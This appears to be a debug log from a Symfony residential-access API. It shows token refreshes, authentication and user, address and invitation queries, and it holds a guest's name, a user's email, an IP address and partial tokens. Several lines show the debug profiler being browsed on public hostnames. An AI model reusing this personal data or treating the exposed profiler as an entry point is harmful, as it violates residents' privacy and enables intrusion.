  4322. [2025-12-18 19:56:25] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  4323. [2025-12-18 19:56:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4324. [2025-12-18 19:56:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4325. [2025-12-18 19:56:25] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4326. [2025-12-18 19:56:25] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4327. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d3e6ab7ec29c90a60851e5ab0e [...]"] []
  4328. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  4329. [2025-12-18 19:56:25] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4330. [2025-12-18 19:56:25] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4331. [2025-12-18 19:56:25] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4332. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  4333. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
  4334. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
  4335. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  4336. [2025-12-18 19:56:25] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [458,259,1] []
  4337. [2025-12-18 19:56:26] doctrine.DEBUG: "START TRANSACTION" [] []
  4338. [2025-12-18 19:56:26] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"6c7b8f88-aef5-440b-a8c3-a8 [...]","2":1,"3":"2025-12-18 19:56:26","4":"2025-12-18 19:56:26","5":"Evelin Del Carmen","6":"Lara Amendola","7":"167801","8":"/invitation/336c8e12c04120 [...]","9":1,"10":null,"11":"2025-12-18 21:00:00","12":null,"13":null,"14":null,"15":259,"16":458} []
  4339. [2025-12-18 19:56:26] doctrine.DEBUG: "COMMIT" [] []
  4340. [2025-12-18 19:56:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  4341. [2025-12-18 19:56:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [259] []
  4342. [2025-12-18 19:56:26] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4343. [2025-12-18 19:58:46] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4344. [2025-12-18 19:58:46] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4345. [2025-12-18 20:03:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4346. [2025-12-18 20:03:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=twig","method":"GET"} []
  4347. [2025-12-18 20:03:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4348. [2025-12-18 20:06:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1015b1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1015b1?panel=router","method":"GET"} []
  4349. [2025-12-18 20:06:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4350. [2025-12-18 20:12:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=request","method":"GET"} []
  4351. [2025-12-18 20:12:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4352. [2025-12-18 20:13:49] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"caf0ac","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/caf0ac/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  4353. [2025-12-18 20:13:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  4354. [2025-12-18 20:18:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=security","method":"GET"} []
  4355. [2025-12-18 20:18:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4356. [2025-12-18 20:20:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4357. [2025-12-18 20:21:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=config","method":"GET"} []
  4358. [2025-12-18 20:21:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4359. [2025-12-18 20:26:01] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  4360. [2025-12-18 20:26:01] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  4361. [2025-12-18 20:26:01] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["be6b1cddd474e5e6372d1ddea8 [...]"] []
  4362. [2025-12-18 20:26:01] doctrine.DEBUG: "START TRANSACTION" [] []
  4363. [2025-12-18 20:26:01] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"c9585ddaf816f5b2cef3132cc5 [...]","3":"2025-12-18 20:56:01","4":"","5":375,"6":"[]"} []
  4364. [2025-12-18 20:26:01] doctrine.DEBUG: "COMMIT" [] []
  4365. [2025-12-18 20:26:01] doctrine.DEBUG: "START TRANSACTION" [] []
  4366. [2025-12-18 20:26:01] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"48d0524dffadf644c34a65c2d7 [...]","3":"2026-02-16 20:26:01","4":"","5":375,"6":"[]"} []
  4367. [2025-12-18 20:26:01] doctrine.DEBUG: "COMMIT" [] []
  4368. [2025-12-18 20:26:01] doctrine.DEBUG: "START TRANSACTION" [] []
  4369. [2025-12-18 20:26:01] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"be6b1cddd474e5e6372d1ddea8 [...]"] []
  4370. [2025-12-18 20:26:01] doctrine.DEBUG: "COMMIT" [] []
  4371. [2025-12-18 20:26:02] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  4372. [2025-12-18 20:26:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4373. [2025-12-18 20:26:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4374. [2025-12-18 20:26:02] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4375. [2025-12-18 20:26:02] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4376. [2025-12-18 20:26:02] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4377. [2025-12-18 20:26:02] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4378. [2025-12-18 20:26:02] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4379. [2025-12-18 20:26:02] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4380. [2025-12-18 20:26:02] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4381. [2025-12-18 20:26:02] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  4382. [2025-12-18 20:26:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4383. [2025-12-18 20:26:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4384. [2025-12-18 20:26:02] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4385. [2025-12-18 20:26:02] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4386. [2025-12-18 20:26:02] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
  4387. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
  4388. [2025-12-18 20:26:03] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/10/0?order=desc","method":"GET"} []
  4389. [2025-12-18 20:26:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4390. [2025-12-18 20:26:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4391. [2025-12-18 20:26:03] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4392. [2025-12-18 20:26:03] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4393. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
  4394. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  4395. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4396. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
  4397. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4398. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4399. [2025-12-18 20:26:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4400. [2025-12-18 20:26:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4401. [2025-12-18 20:26:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4402. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4403. [2025-12-18 20:26:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4404. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4405. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["E9690C4C-7479-437B-82D6-F9 [...]",1,375] []
  4406. [2025-12-18 20:26:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4407. [2025-12-18 20:26:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4408. [2025-12-18 20:26:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4409. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
  4410. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4411. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
  4412. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4413. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  4414. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [251,1] []
  4415. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
  4416. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4417. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
